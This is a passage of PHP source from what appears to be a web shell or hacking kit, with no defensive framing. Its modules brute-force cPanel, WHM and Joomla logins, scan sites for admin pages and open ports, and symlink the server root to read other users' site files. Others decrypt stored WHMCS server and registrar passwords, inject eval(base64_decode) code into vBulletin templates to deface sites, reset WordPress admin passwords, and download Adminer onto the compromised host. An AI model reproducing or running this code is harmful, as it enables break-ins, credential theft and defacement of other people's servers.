echo "<div align=center><table width=80% ><tr><td align=center><b><font color=red size=1>Attacking user $user </font></td></tr></table>";
$finaluser = trim($user);
foreach ($passlist as $password ) {
$finalpass = trim($password);
cpanel($target,$finaluser,$finalpass,$connect_timeout);
}
}
}
function whm($host,$user,$pass,$timeout){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$host:2086");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 0 ){
echo "<table width=100% ><tr><td align=center><b><font color=white size=2>==================================</font><font color=red size=2> $user </font><font color=white size=2>cracked with </font><font color=red size=2> $pass </font> <font color=white size=2>==================================</font></b></td></tr></table>";
}
curl_close($ch);}
$userlist=explode("\n",$userl);
$passlist=explode("\n",$passl);
if ($attack == "whm")
{
foreach ($userlist as $user) {
echo "<table width=80% ><tr><td align=center><b><font color=white size=2>user under attack is $user </font></td></tr></table>";
$finaluser = trim($user);
foreach ($passlist as $password ) {
$finalpass = trim($password);
whm($target,$finaluser,$finalpass,$connect_timeout);
}
}
}
}
elseif($userl=="")
{
echo "user kosong";
}
elseif($passl=="")
{
echo "sukses.";
}
}
}
///////////////////////////////////////////////
elseif($_GET['do'] == 'afinder') {
set_time_limit(0);
error_reporting(0);
$list['front'] ="admin
adm
admincp
admcp
cp
modcp
moderatorcp
adminarea
admins
cpanel
controlpanel";
$list['end'] = "admin1.php
admin1.html
admin2.php
adminweb/
adminweb/index.php
redaktur/index.php
v2/login/
adminback/
alahamdulillah/
entry/
enter/
kcfinder/browser.php
kcfinder/upload.php
admins/
sika/
masterweb/index.php
webadmin/index.php
v2/
admin-web/
old/
dulu/
old/adminweb/
webadmin/
superuser/
redakturweb/
simpeg/
terminal/
monitor/
portal/
portaladmin/
terasadmin/
jdih/
manager/
data/
webmin/
myadmin/
leb/
w3bc0ntr0l/
adminkoster/
panel/
pegawai/
staffadmin/
upload.php
counterweb/
ereporting/
web-admin/index.php
index.php/adminweb/
author/adminweb/
author/webadmin/index.php
author/admin/
developer/
guru/index.php
loginguru/
lama/adminweb/
backup/login/
backup/adminweb/
author/
admin.web/
v1/login/
v2/admin/
v2/admin/
administrator/
administrator/index.php
adipura/
pintumasuk/
pintu/
tersembunyi/
bapeda/
loggin/
admin/
admin.php
admin.html
admin/cp.php
admin/cp.html
cp.php
cp.html
siakad/
journal/
sia/
fakultas/
pegawai/
petugas/
penjaga/
4dminW3B/
config/
akademik/
adweb2_cad/
kuncen/
dasboard/
administrator/
administrator/index.html
administrator/index.php
administrator/login.html
administrator/login.php
administrator/account.html
administrator/account.php
administrator.php
administrator.html
login.php
login.html
modelsearch/login.php
moderator.php
moderator.html
moderator/login.php
moderator/login.html
moderator/admin.php
moderator/admin.html
moderator/
account.php
account.html
controlpanel/
controlpanel.php
controlpanel.html
admincontrol.php
admincontrol.html
adminpanel.php
adminpanel.html
admin1.asp
admin2.asp
yonetim.asp
yonetici.asp
admin/account.asp
admin/index.asp
admin/login.asp
admin/home.asp
admin/controlpanel.asp
admin.asp
admin/cp.asp
cp.asp
administrator/index.asp
administrator/login.asp
administrator/account.asp
administrator.asp
login.asp
modelsearch/login.asp
moderator.asp
moderator/login.asp
moderator/admin.asp
account.asp
controlpanel.asp
admincontrol.asp
adminpanel.asp
fileadmin/
fileadmin.php
fileadmin.asp
fileadmin.html
administration/
administration.php
administration.html
sysadmin.php
sysadmin.html
phpmyadmin/
myadmin/
sysadmin.asp
sysadmin/
ur-admin.asp
ur-admin.php
ur-admin.html
ur-admin/
Server.php
Server.html
Server.asp
Server/
wp-admin/
administr8.php
administr8.html
administr8/
administr8.asp
webadmin/
webadmin.php
webadmin.asp
webadmin.html
administratie/
admins/
admins.php
admins.asp
admins.html
administrivia/
Database_Administration/
WebAdmin/
useradmin/
sysadmins/
admin1/
system-administration/
administrators/
pgadmin/
directadmin/
staradmin/
ServerAdministrator/
SysAdmin/
administer/
LiveUser_Admin/
sys-admin/
typo3/
panel/
cpanel/
cPanel/
cpanel_file/
platz_login/
rcLogin/
blogindex/
formslogin/
autologin/
support_login/
meta_login/
manuallogin/
simpleLogin/
loginflat/
utility_login/
showlogin/
memlogin/
members/
login-redirect/
sub-login/
wp-login/
login1/
dir-login/
login_db/
xlogin/
smblogin/
customer_login/
UserLogin/
login-us/
acct_login/
admin_area/
bigadmin/
project-admins/
phppgadmin/
pureadmin/
sql-admin/
radmind/
openvpnadmin/
wizmysqladmin/
vadmind/
ezsqliteadmin/
hpwebjetadmin/
newsadmin/
adminpro/
Lotus_Domino_Admin/
bbadmin/
vmailadmin/
Indy_admin/
ccp14admin/
irc-macadmin/
banneradmin/
sshadmin/
phpldapadmin/
macadmin/
administratoraccounts/
admin4_account/
admin4_colon/
radmind-1/
Super-Admin/
AdminTools/
cmsadmin/
SysAdmin2/
globes_admin/
cadmins/
phpSQLiteAdmin/
navSiteAdmin/
server_admin_small/
logo_sysadmin/
server/
database_administration/
power_user/
system_administration/
ss_vms_admin_sm/
adminarea/
bb-admin/
adminLogin/
panel-administracion/
instadmin/
memberadmin/
administratorlogin/
admin/admin.php
admin_area/admin.php
admin_area/login.php
siteadmin/login.php
siteadmin/index.php
siteadmin/login.html
admin/admin.html
admin_area/index.php
bb-admin/index.php
bb-admin/login.php
bb-admin/admin.php
admin_area/login.html
admin_area/index.html
admincp/index.asp
admincp/login.asp
admincp/index.html
webadmin/index.html
webadmin/admin.html
webadmin/login.html
admin/admin_login.html
admin_login.html
panel-administracion/login.html
nsw/admin/login.php
webadmin/login.php
admin/admin_login.php
admin_login.php
admin_area/admin.html
pages/admin/admin-login.php
admin/admin-login.php
admin-login.php
bb-admin/index.html
bb-admin/login.html
bb-admin/admin.html
admin/home.html
pages/admin/admin-login.html
admin/admin-login.html
admin-login.html
admin/adminLogin.html
adminLogin.html
home.html
rcjakar/admin/login.php
adminarea/index.html
adminarea/admin.html
webadmin/index.php
webadmin/admin.php
user.html
modelsearch/login.html
adminarea/login.html
panel-administracion/index.html
panel-administracion/admin.html
modelsearch/index.html
modelsearch/admin.html
admincontrol/login.html
adm/index.html
adm.html
user.php
panel-administracion/login.php
wp-login.php
adminLogin.php
admin/adminLogin.php
home.php
adminarea/index.php
adminarea/admin.php
adminarea/login.php
panel-administracion/index.php
panel-administracion/admin.php
modelsearch/index.php
modelsearch/admin.php
admincontrol/login.php
adm/admloginuser.php
admloginuser.php
admin2/login.php
admin2/index.php
adm/index.php
adm.php
affiliate.php
adm_auth.php
memberadmin.php
administratorlogin.php
admin/admin.asp
admin_area/admin.asp
admin_area/login.asp
admin_area/index.asp
bb-admin/index.asp
bb-admin/login.asp
bb-admin/admin.asp
pages/admin/admin-login.asp
admin/admin-login.asp
admin-login.asp
user.asp
webadmin/index.asp
webadmin/admin.asp
webadmin/login.asp
admin/admin_login.asp
admin_login.asp
panel-administracion/login.asp
adminLogin.asp
admin/adminLogin.asp
home.asp
adminarea/index.asp
adminarea/admin.asp
adminarea/login.asp
panel-administracion/index.asp
panel-administracion/admin.asp
modelsearch/index.asp
modelsearch/admin.asp
admincontrol/login.asp
adm/admloginuser.asp
admloginuser.asp
admin2/login.asp
admin2/index.asp
adm/index.asp
adm.asp
affiliate.asp
adm_auth.asp
memberadmin.asp
administratorlogin.asp
siteadmin/login.asp
siteadmin/index.asp
ADMIN/
paneldecontrol/
login/
cms/
admon/
ADMON/
administrador/
ADMIN/login.php
panelc/
ADMIN/login.html";
function template() {
echo '
<script type="text/javascript">
<!--
function insertcode($text, $place, $replace)
{
var $this = $text;
var logbox = document.getElementById($place);
if($replace == 0)
document.getElementById($place).innerHTML = logbox.innerHTML+$this;
else
document.getElementById($place).innerHTML = $this;
//document.getElementById("helpbox").innerHTML = $this;
}
-->
</script>
<br>
<br>
<h1 class="technique-two">
</h1>
<div class="wrapper">
<div class="red">
<div class="tube">
<center><table class="tabnet"><th colspan="2">Admin Finder</th><tr><td>
<form action="" method="post" name="xploit_form">
<tr>
<tr>
<b><td>URL</td>
<td><input class="inputz" type="text" name="xploit_url" value="'.$_POST['xploit_url'].'" style="width: 350px;" />
</td>
</tr><tr>
<td>404 string</td>
<td><input class="inputz" type="text" name="xploit_404string" value="'.$_POST['xploit_404string'].'" style="width: 350px;" />
</td></b>
</tr><br><td>
<span style="float: center;"><input class="inputzbut" type="submit" name="xploit_submit" value=" Start Scan" align="center" />
</span></td></tr>
</form></td></tr>
<br /></table>
</div> <!-- /tube -->
</div> <!-- /red -->
<br />
<div class="green">
<div class="tube" id="rightcol">
Verificat: <span id="verified">0</span> / <span id="total">0</span><br />
<b>Found ones:<br /></b>
</div> <!-- /tube -->
</div></center><!-- /green -->
<br clear="all" /><br />
<div class="blue">
<div class="tube" id="logbox">
<br />
<br />
Admin page Finder :<br /><br />
</div> <!-- /tube -->
</div> <!-- /blue -->
</div> <!-- /wrapper -->
<br clear="all"><br>';
}
function show($msg, $br=1, $stop=0, $place='logbox', $replace=0) {
if($br == 1) $msg .= "<br />";
echo "<script type=\"text/javascript\">insertcode('".$msg."', '".$place."', '".$replace."');</script>";
if($stop == 1) exit;
@flush();@ob_flush();
}
function check($x, $front=0) {
global $_POST,$site,$false;
if($front == 0) $t = $site.$x;
else $t = 'http://'.$x.'.'.$site.'/';
$headers = get_headers($t);
if (!eregi('200', $headers[0])) return 0;
$data = @file_get_contents($t);
if($_POST['xploit_404string'] == "") if($data == $false) return 0;
if($_POST['xploit_404string'] != "") if(strpos($data, $_POST['xploit_404string'])) return 0;
return 1;
}
// --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
template();
if(!isset($_POST['xploit_url'])) die;
if($_POST['xploit_url'] == '') die;
$site = $_POST['xploit_url'];
if ($site[strlen($site)-1] != "/") $site .= "/";
if($_POST['xploit_404string'] == "") $false = @file_get_contents($site."d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html");
$list['end'] = str_replace("\r", "", $list['end']);
$list['front'] = str_replace("\r", "", $list['front']);
$pathes = explode("\n", $list['end']);
$frontpathes = explode("\n", $list['front']);
show(count($pathes)+count($frontpathes), 1, 0, 'total', 1);
$verificate = 0;
foreach($pathes as $path) {
show('Checking '.$site.$path.' : ', 0, 0, 'logbox', 0);
$verificate++; show($verificate, 0, 0, 'verified', 1);
if(check($path) == 0) show('not found', 1, 0, 'logbox', 0);
else{
show('<span style="color: #00FF00;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
show('<a href="'.$site.$path.'">'.$site.$path.'</a>', 1, 0, 'rightcol', 0);
}
}
preg_match("/\/\/(.*?)\//i", $site, $xx); $site = $xx[1];
if(substr($site, 0, 3) == "www") $site = substr($site, 4);
foreach($frontpathes as $frontpath) {
show('Checking http://'.$frontpath.'.'.$site.'/ : ', 0, 0, 'logbox', 0);
$verificate++; show($verificate, 0, 0, 'verified', 1);
if(check($frontpath, 1) == 0) show('not found', 1, 0, 'logbox', 0);
else{
show('<span style="color: #00FF00;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
show('<a href="http://'.$frontpath.'.'.$site.'/">'.$frontpath.'.'.$site.'</a>', 1, 0, 'rightcol', 0);
}
}
}
/////////////////////////////////////////////////////////////////////
elseif($_GET['do'] == 'adminer') {
$full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
function adminer($url, $isi) {
$fp = fopen($isi, "w");
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_FILE, $fp);
return curl_exec($ch);
curl_close($ch);
fclose($fp);
ob_flush();
flush();
}
if(file_exists('adminer.php')) {
echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
} else {
if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
} else {
echo "<center><font color=red>gagal buat file adminer</font></center>";
}
}
}
///////////////////////////////////////////////////////////////////
elseif($_GET['do'] == 'whois')
{
?>
<form action="?y=<?php echo $pwd; ?>&x=whois" method="post">
<?php
@set_time_limit(0);
@error_reporting(0);
function sws_domain_info($site)
{
$getip = @file_get_contents("http://networktools.nl/whois/$site");
flush();
$ip = @findit($getip,'<pre>','</pre>');
return $ip;
flush();
}
function sws_net_info($site)
{
$getip = @file_get_contents("http://networktools.nl/asinfo/$site");
$ip = @findit($getip,'<pre>','</pre>');
return $ip;
flush();
}
function sws_site_ser($site)
{
$getip = @file_get_contents("http://networktools.nl/reverseip/$site");
$ip = @findit($getip,'<pre>','</pre>');
return $ip;
flush();
}
function sws_sup_dom($site)
{
$getip = @file_get_contents("http://www.magic-net.info/dns-and-ip-tools.dnslookup?subd=".$site."&Search+subdomains=Find+subdomains");
$ip = @findit($getip,'<strong>Nameservers found:</strong>','<script type="text/javascript">');
return $ip;
flush();
}
function sws_port_scan($ip)
{
$list_post = array('80','21','22','2082','25','53','110','443','143');
foreach ($list_post as $o_port)
{
$connect = @fsockopen($ip,$o_port,$errno,$errstr,5);
if($connect)
{
echo " $ip : $o_port ??? <u style=\"color: #00ff00\">Open</u> <br /><br />";
flush();
}
}
}
function findit($mytext,$starttag,$endtag) {
$posLeft = @stripos($mytext,$starttag)+strlen($starttag);
$posRight = @stripos($mytext,$endtag,$posLeft+1);
return @substr($mytext,$posLeft,$posRight-$posLeft);
flush();
}
echo '<br><br><center>';
echo '
<br />
<div class="sc"><form method="post"><table class="tabnet">
<tr><th colspan="5">Website Whois</th></tr>
<tr><td>Site to scan </td><td>:</td><td><input type="text" name="site" size="50" style="color:#00ff00;background-color:#000000" class="inputz" value="site.com" />   <input class="inputzbut" type="submit" style="color:#00ff00;background-color:#000000" name="scan" value="Scan !" /></td></tr>
</table></form></div>';
if(isset($_POST['scan']))
{
$site = @htmlentities($_POST['site']);
if (empty($site)){die('<br /><br /> Not add IP .. !');}
$ip_port = @gethostbyname($site);
echo "
<br /><div class=\"sc2\">Scanning [ $site ip $ip_port ] ... </div>
<div class=\"tit\"> <br /><br />|-------------- Port Server ------------------| <br /></div>
<div class=\"ru\"> <br /><br /><pre>
";
echo "".sws_port_scan($ip_port)." </pre></div> ";
flush();
echo "<div class=\"tit\"><br /><br />|-------------- Domain Info ------------------| <br /> </div>
<div class=\"ru\">
<pre>".sws_domain_info($site)."</pre></div>";
flush();
echo "
<div class=\"tit\"> <br /><br />|-------------- Network Info ------------------| <br /></div>
<div class=\"ru\">
<pre>".sws_net_info($site)."</pre> </div>";
flush();
echo "<div class=\"tit\"> <br /><br />|-------------- subdomains Server ------------------| <br /></div>
<div class=\"ru\">
<pre>".sws_sup_dom($site)."</pre> </div>";
flush();
echo "<div class=\"tit\"> <br /><br />|-------------- Site Server ------------------| <br /></div>
<div class=\"ru\">
<pre>".sws_site_ser($site)."</pre> </div>
<div class=\"tit\"> <br /><br />|-------------- END ------------------| <br /></div>";
flush();
}
echo '</center>';
}
///////////////////////////////////////////////////////////
elseif($_GET['do'] == 'sym') {
@set_time_limit(0);
echo "<br><br><center><h1>+--=[ Symlink ]=--+</h1></center><br><br><center><div class=content>";
@mkdir('sym',0777);
$htaccess = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
$write =@fopen ('sym/.htaccess','w');
fwrite($write ,$htaccess);
@symlink('/','sym/root');
$filelocation = basename(__FILE__);
$read_named_conf = @file('/etc/named.conf');
if(!$read_named_conf)
{
echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
}
else
{
echo "<br><br><div class='tmp'><table border='1' bordercolor='#00ff00' width='500' cellpadding='1' cellspacing='0'><td>Domains</td><td>Users</td><td>symlink </td>";
foreach($read_named_conf as $subject){
if(eregi('zone',$subject)){
preg_match_all('#zone "(.*)"#',$subject,$string);
flush();
if(strlen(trim($string[1][0])) >2){
$UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0]));
$name = $UID['name'] ;
@symlink('/','sym/root');
$name = $string[1][0];
$iran = '\.ir';
$israel = '\.il';
$indo = '\.id';
$sg12 = '\.sg';
$edu = '\.edu';
$gov = '\.gov';
$gose = '\.go';
$gober = '\.gob';
$mil1 = '\.mil';
$mil2 = '\.mi';
$malay = '\.my';
$china = '\.cn';
$japan = '\.jp';
$austr = '\.au';
$porn = '\.xxx';
$as = '\.uk';
$calfn = '\.ca';
if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0])
or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0])
or eregi ("$malay",$string[1][0]) or eregi("$china",$string[1][0]) or eregi("$japan",$string[1][0]) or eregi ("$austr",$string[1][0])
or eregi("$porn",$string[1][0]) or eregi("$as",$string[1][0]) or eregi ("$calfn",$string[1][0]))
{
$name = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$string[1][0].'</div>';
}
echo "
<tr>
<td>
<div class='dom'><a target='_blank' href=http://www.".$string[1][0].'/>'.$name.' </a> </div>
</td>
<td>
'.$UID['name']."
</td>
<td>
<a href='sym/root/home/".$UID['name']."/public_html' target='_blank'>Symlink </a>
</td>
</tr></div> ";
flush();
}
}
}
}
echo "</center></table>";
}
///////////////////////////////////////////////////////////
elseif($_GET['do'] == 'whm') {
function decrypt ($string,$cc_encryption_hash)
{
$key = md5 (md5 ($cc_encryption_hash)) . md5 ($cc_encryption_hash);
$hash_key = _hash ($key);
$hash_length = strlen ($hash_key);
$string = base64_decode ($string);
$tmp_iv = substr ($string, 0, $hash_length);
$string = substr ($string, $hash_length, strlen ($string) - $hash_length);
$iv = $out = '';
$c = 0;
while ($c < $hash_length)
{
$iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
++$c;
}
$key = $iv;
$c = 0;
while ($c < strlen ($string))
{
if (($c != 0 AND $c % $hash_length == 0))
{
$key = _hash ($key . substr ($out, $c - $hash_length, $hash_length));
}
$out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string[$c]));
++$c;
}
return $out;
}
function _hash ($string)
{
if (function_exists ('sha1'))
{
$hash = sha1 ($string);
}
else
{
$hash = md5 ($string);
}
$out = '';
$c = 0;
while ($c < strlen ($hash))
{
$out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
$c += 2;
}
return $out;
}
echo "
<br><center><font size='5' color='#00ff00'><b>-=[ WHMCS Decoder ]=-</b></font></center>
<center>
<br>
<FORM action='' method='post'>
<input type='hidden' name='form_action' value='2'>
<br>
<table class=tabnet style=width:320px;padding:0 1px;>
<tr><th colspan=2>WHMCS Decoder</th></tr>
<tr><td>db_host </td><td><input type='text' style='color:#00ff00;background-color:' class='inputz' size='38' name='db_host' value='localhost'></td></tr>
<tr><td>db_username </td><td><input type='text' style='color:#00ff00;background-color:' class='inputz' size='38' name='db_username' value=''></td></tr>
<tr><td>db_password</td><td><input type='text' style='color:#00ff00;background-color:' class='inputz' size='38' name='db_password' value=''></td></tr>
<tr><td>db_name</td><td><input type='text' style='color:#00ff00;background-color:' class='inputz' size='38' name='db_name' value=''></td></tr>
<tr><td>cc_encryption_hash</td><td><input style='color:#00ff00;background-color:' type='text' class='inputz' size='38' name='cc_encryption_hash' value=''></td></tr>
<td> <INPUT class='inputzbut' type='submit' style='color:#00ff00;background-color:' value='Submit' name='Submit'></td>
</table>
</FORM>
</center>
";
if($_POST['form_action'] == 2 )
{
//include($file);
$db_host=($_POST['db_host']);
$db_username=($_POST['db_username']);
$db_password=($_POST['db_password']);
$db_name=($_POST['db_name']);
$cc_encryption_hash=($_POST['cc_encryption_hash']);
$link=mysql_connect($db_host,$db_username,$db_password) ;
mysql_select_db($db_name,$link) ;
$query = mysql_query("SELECT * FROM tblservers");
while($v = mysql_fetch_array($query)) {
$ipaddress = $v['ipaddress'];
$username = $v['username'];
$type = $v['type'];
$active = $v['active'];
$hostname = $v['hostname'];
echo("<center><table border='1'>");
$password = decrypt ($v['password'], $cc_encryption_hash);
echo("<tr><td>Type</td><td>$type</td></tr>");
echo("<tr><td>Active</td><td>$active</td></tr>");
echo("<tr><td>Hostname</td><td>$hostname</td></tr>");
echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
echo("<tr><td>Username</td><td>$username</td></tr>");
echo("<tr><td>Password</td><td>$password</td></tr>");
echo "</table><br><br></center>";
}
$link=mysql_connect($db_host,$db_username,$db_password) ;
mysql_select_db($db_name,$link) ;
$query = mysql_query("SELECT * FROM tblregistrars");
echo("<center>Domain Reseller <br><table class=tabnet border='1'>");
echo("<tr><td>Registrar</td><td>Setting</td><td>Value</td></tr>");
while($v = mysql_fetch_array($query)) {
$registrar = $v['registrar'];
$setting = $v['setting'];
$value = decrypt ($v['value'], $cc_encryption_hash);
if ($value=="") {
$value=0;
}
$password = decrypt ($v['password'], $cc_encryption_hash);
echo("<tr><td>$registrar</td><td>$setting</td><td>$value</td></tr>");
}
}
}
///////////////////////////////////////////////////////////
elseif($_GET['do'] == 'decode') {
$text = $_POST['code'];
echo '<center><br><br><b>+--=[ Script Encode & Decode ]=--+</b><br><br>
<form method="post"><br><br><br>';
echo '<textarea class="inputz" cols=80 rows=10 name="code"></textarea><br><br>
<select class="inputz" size="1" name="ope">
<option value="base64">Base64</option>
<option value="gzinflate">str_rot13 - gzinflate - base64</option>
<option value="str">str_rot13 - gzinflate - str_rot13 - base64</option>
</select> <input class="inputzbut" type="submit" name="submit" value="Encrypt">
<input class="inputzbut" type="submit" name="submits" value="Decrypt">
</form>';
$submit = $_POST['submit'];
if (isset($submit)){
$op = $_POST["ope"];
switch ($op) {case 'base64': $codi=base64_encode($text);
break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text)));
break;default:break;}}
$submit = $_POST['submits'];
if (isset($submit)){
$op = $_POST["ope"];
switch ($op) {case 'base64': $codi=base64_decode($text);
break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text)));
break;default:break;}}
echo '<textarea cols=80 rows=10 class="inputz" readonly>'.$codi.'</textarea></center><BR><BR>';
}
///////////////////////////////////////////////////////////
elseif($_GET['do'] == 'jbrute') {
echo '<center><b><font color="lime">+--=[ Joomla Bruter Force ]=--+</font></b><br /><br />
<form method="post" action="" enctype="multipart/form-data">
<table class="tabnet" width="38%" border="0"><center>
<th colspan="2">Joomla Brute Force</th>
<tr><td><p ><font class="d1">User :</font></th>
<input class="inputz" type="text" name="usr" value="admin" size="15"> </font></center><br /><br /></p>
</td></tr>
<tr><td><font class="">Sites list :</font>
</td><td><font class="" >Pass list :</font></td></tr>
<tr>
<td>
<textarea name="sites" style="background:black;" cols="40" rows="13" ></textarea>
</td><td>
<textarea name="w0rds" style="background:black;" cols="40" rows="13" >
admin
123456
password
102030
123123
12345
123456789
pass
test
admin123
demo
!@#$%^
</textarea>
</td></tr><center><tr><td>
<font >
<input class="inputzbut" type="submit" name="x" value="start" id="d4">
</font></td></tr><br>
<br></center></table>
</form></center>';
@set_time_limit(0);
if($_POST['x']){
echo "<hr>";
$sites = explode("\n",$_POST["sites"]); // Get Sites
$w0rds = explode("\n",$_POST["w0rds"]); // Get w0rdLiSt
$Attack = new Joomla_brute_Force(); // Active Class
foreach($w0rds as $pwd){
foreach($sites as $site){
$Attack->check_it(txt_cln($site),$_POST['usr'],txt_cln($pwd)); // Brute :D
flush();flush();
}
}
}
# Class & Function'z
function txt_cln($value){ return str_replace(array("\n","\r"),"",$value); }
class Joomla_brute_Force{
public function check_it($site,$user,$pass){ // print result
if(eregi('com_config',$this->post($site,$user,$pass))){
echo "<span class=\"x2\"><b># Success : $user:$pass -> <a href='$site/administrator/index.php'>$site/administrator/index.php</a></b></span><BR>";
$f = fopen("Result.txt","a+"); fwrite($f , "Success ~~ $user:$pass -> $site/administrator/index.php\n"); fclose($f);
flush();
}else{ echo "# Failed : $user:$pass -> $site<BR>"; flush();}
}
public function post($site,$user,$pass){ // Post -> user & pass
$token = $this->extract_token($site);
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
@curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
@curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
@curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_POST,1);
curl_setopt($curl,CURLOPT_POSTFIELDS,'username='.$user.'&passwd='.$pass.'&lang=en-GB&option=com_login&task=login&'.$token.'=1');
curl_setopt($curl,CURLOPT_TIMEOUT,20);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
public function extract_token($site){ // get token from source for -> function post
$source = $this->get_source($site);
preg_match_all("/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si" ,$source,$token);
return $token[1][0];
}
public function get_source($site){ // get source for -> function extract_token
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
@curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
@curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317 Firefox/3.0.4');
@curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_TIMEOUT,20);
$exec=curl_exec($curl);
curl_close($curl);
return $exec;
}
}
}
///////////////////////////////////////////////////////////
elseif($_GET['do'] == 'vbindex') {
echo '<div align="center">
<H2><span style="font-weight: 400"><font face="Trebuchet MS" size="4">
<b><font color="#00FF00">+--=[ VB Index Changer ]=--+</font></b>
</div><br>';
if(empty($_POST['index'])){
echo "<center><FORM method=\"POST\">";
echo "<table class=\"tabnet\">
<th colspan=\"2\">Vb Index Changer</th>
<tr><td>host </td><td><input class=\"inputz\" type=\"text\" size=\"60\" name=\"localhost\" value=\"localhost\"></td></tr>
<tr><td>database </td><td><input class=\"inputz\" type=\"text\" size=\"60\" name=\"database\" value=\"forum_vb\"></td></tr>
<tr><td>username </td><td><input class=\"inputz\" type=\"text\" size=\"60\" name=\"username\" value=\"user_vb\"></td></tr>
<tr><td>password </td><td><input class=\"inputz\" type=\"text\" size=\"60\" name=\"password\" value=\"vb\"></td></tr>
</tr>
<th colspan=\"2\">Your Index Code</th></table><table class=\"tabnet\">
<TEXTAREA name=\"index\" rows=\"13\" style=\"background:black\" border=\"1\" cols=\"69\" name=\"code\">your index code</TEXTAREA><br>
<INPUT class=\"inputzbut\" type=\"submit\" value=\"setting\" name=\"send\">
</FORM></table></center>";
}else{
$localhost = $_POST['localhost'];
$database = $_POST['database'];
$username = $_POST['username'];
$password = $_POST['password'];
$index = $_POST['index'];
@mysql_connect($localhost,$username,$password) or die(mysql_error());
@mysql_select_db($database) or die(mysql_error());
$index=str_replace("\'","'",$index);
$set_index = "{\${eval(base64_decode(\'";
$set_index .= base64_encode("echo \"$index\";");
$set_index .= "\'))}}{\${exit()}}</textarea>";
echo("UPDATE template SET template ='".$set_index."' ") ;
$ok=@mysql_query("UPDATE template SET template ='".$set_index."'") or die(mysql_error());
if($ok){
echo "!! update finish !!<br><br>";
}
}
}
///////////////////////////////////////////////////////////
elseif($_GET['do'] == 'wprespas') {
echo "<center/><br/><b><font color=#00ff00>+--==[ Wordpress Reset Password ]==--+</font></b><br><br>";
if(empty($_POST['pwd'])){
echo "<FORM method='POST'>
<table class='tabnet' style='width:300px;'> <tr><th colspan='2'>Connect to mySQL server</th></tr> <tr><td> Hostname</td><td>
<input style='width:220px;' class='inputz' type='text' name='localhost' value='localhost' /></td></tr> <tr><td> Database</td><td>
<input style='width:220px;' class='inputz' type='text' name='database' value='wp-' /></td></tr> <tr><td> username</td><td>
<input style='width:220px;' class='inputz' type='text' name='username' value='wp-' /></td></tr> <tr><td> password</td><td>
<input style='width:220px;' class='inputz' type='text' name='password' value='**' /></td></tr>
<tr><td> User baru</td><td>
<input style='width:220px;' class='inputz' type='text' name='admin' value='admin' /></td></tr>
<tr><td> Pass Baru</td><td>
<input style='width:80px;' class='inputz' type='text' name='pwd' value='123456' />
<input style='width:19%;' class='inputzbut' type='submit' value='change!' name='send' /></FORM>
</td></tr> </table><br><br><br><br>
";
}else{
$localhost = $_POST['localhost'];
$database = $_POST['database'];
$username = $_POST['username'];
$password = $_POST['password'];
$pwd = $_POST['pwd'];
$admin = $_POST['admin'];
@mysql_connect($localhost,$username,$password) or die(mysql_error());
@mysql_select_db($database) or die(mysql_error());
$hash = crypt($pwd);
